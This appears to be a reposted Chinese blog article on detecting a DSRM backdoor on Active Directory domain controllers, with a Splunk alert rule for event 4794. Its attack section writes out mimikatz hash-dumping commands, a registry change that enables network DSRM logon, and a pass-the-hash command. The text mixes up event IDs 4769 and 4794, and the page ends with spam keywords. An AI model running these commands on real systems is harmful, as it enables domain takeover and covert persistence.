<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    基于AD Event日志實時檢測DSRM后門

    VSole2023-01-11 16:55:03

    01、簡介

    每個域控制器都有一個目錄還原模式(DSRM)帳戶,它的密碼是在安裝域控時設置的,實際上它對應的就是sam文件里的本地管理員“administrator”,基本很少會被重置,因此有著極強的隱蔽性。攻擊者通過獲取域控的DSRM密碼,就可以使用帳戶通過網絡登錄到域控服務器,從而達到權限維持的目的。

    域內權限維持的方式有很多,每增加一條安全檢測規則,就多一層安全保障。針對DSRM后門,基于AD Event日志能夠幫助我們提供什么維度的檢測,我們通過一個后門利用實例來看一下。

    02、利用方式

    (1)獲取域內用戶Hash

    使用mimikatz查看域內用戶test的NTLM Hash。

    mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
    

    (2)將DSRM帳戶和域用戶的NTLM Hash同步

    使用DSRM的密碼和指定域用戶test的密碼進行同步,在命令行環境中使用ntdsutil工具重置DSRM管理員密碼。

    (3)抓取DSRM密碼

    因同步域內用戶test的NTLM Hash,可以發現,DSRM Hash 和域用戶test的NTLM Hash一致。

    mimikatz # privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
    

    (4)修改DSRM登錄方式

    DSRM 有三種登錄方式,具體如下:

    0:默認值,只有當域控制器重啟并進入 DSRM 模式時,才可以使用 DSRM 管理員賬號1:只有當本地 AD、DS 服務停止時,才可以使用 DSRM 管理員賬號登錄域控制器2:在任何情況下,都可以使用 DSRM 管理員賬號登錄域控制器
    

    如果要使用 DSRM 賬號通過網絡登錄域控制器,需要將該值設置為 2。

    修改注冊表:

    reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
    

    (5)使用DSRM遠程登錄

    在域成員服務器上使用DSRM進行遠程登錄,注意domain使用域控的主機名。

    mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
    

    03、攻擊檢測

    當攻擊者嘗試重置DSRM管理員密碼或是指定域內用戶NTLM Hash同步時,都會生成4769事件,因此可以實時監控4794事件,一旦攻擊者嘗試修改DSRM密碼就會觸發告警。

    4794事件:每次更改目錄還原模式(DSRM)管理員密碼時,就會生成此事件,包含SID和帳戶名,以及調用方工作站。

    安全規則:

    index=ad  EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time  by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"時間內,域控服務器:"+dest +" 疑似DSRM域后門行為,試圖設置目錄服務還原模式管理員密碼"+count+"次,操作賬號:"+user| table start_time end_time user message
    

    安全告警效果如下圖:

    域控制器hash
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    本篇文章詳細記錄了一個內網+服務環境靶機的滲透過程,大約涉及到15臺主機,由于這些靶機都在虛擬機內搭建,和實戰相比有所區別,但可以盡最大程度地模擬實戰的情況。 從一級代理到三級代理,使用內網安全中常見的攻擊手段(置零攻擊、票據、域信任等)和服務安全常用的滲透手段(MSSQL利用存儲過程提權、shiro550、Struts2-052漏洞等等)通過對內網中各個主機的滲透,一步步將Web服務器、子域控
    一個內網安全攻防的知識倉庫
    在這篇文章中,我們可以了解到 DCSync 的原理及檢測方法。AD 還支持特殊的 NC,通常稱為應用程序分區或非域命名上下文 。關于 DCSync 攻擊DCSync 是一種用于從域控制器中提取憑據的技術。作為對此的響應,域控制器將返回包含密碼哈希的復制數據
    Pass The Hash 即哈希傳遞攻擊,簡稱 PTH
    攻擊者通過獲取域控的DSRM密碼,就可以使用帳戶通過網絡登錄到域控服務器,從而達到權限維持的目的。域內權限維持的方式有很多,每增加一條安全檢測規則,就多一層安全保障。
    Dcsync在域環境中,不同域控制器之間,每 15 分鐘都會有一次域數據的同步。如果需要同步的數據比較多,則會重復上述過程。
    pass-the-hash在內網滲透中是一種很經典的攻擊方式,原理就是攻擊者可以直接通過LM Hash和NTLM Hash訪問遠程主機或服務,而不用提供明文密碼。
    內網滲透TIPS總結
    2023-01-28 11:00:41
    內網基礎知識1、工作組:工作組是 局域網 中的一個概念,他是長久的資源管理模式。默認情況下使用工作組方式進行資源管理,將不同的 computer 按照不同的要求分類到不同的組。而實際上,因為域名的計算機是使用DNS 來定位域控制器、服務器及其他計算機、網絡服務的,所以域的名字就是DNS 域的名字。在內網滲透測試中,大都是通過尋找 DNS 服務器來確定域控制器的位置的。
    很多人把這個原因歸結于KB2871997補丁,實際上不然,這個事情的成因實際是UAC在搗亂。RID為500的賬戶和屬于本地administrators組的域用戶在通過網絡遠程鏈接時,默認就是高權限令牌。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类